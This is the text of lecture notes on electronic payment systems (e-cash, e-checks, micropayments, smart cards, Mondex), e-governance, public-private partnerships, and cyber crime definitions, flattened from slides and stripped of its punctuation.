Finally the merchant requests a money transfer to its account
E-CASH
Electronic money is paperless cash This money is either stored on a card itself or in an account
associated with the card
The most common examples are transit cards meal plans and PayPal E-Cash can also mean
any kind of electronic payment
Electronic payment systems come in many forms including virtual cheques ATM cards credit
cards and stored value cards The usual security features for such systems are privacy
authenticity and no repudiation
There are four major components in an electronic cash system
Issuers
Customers
Merchants or traders
Regulators
Issuers can be banks or non-bank institutions
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
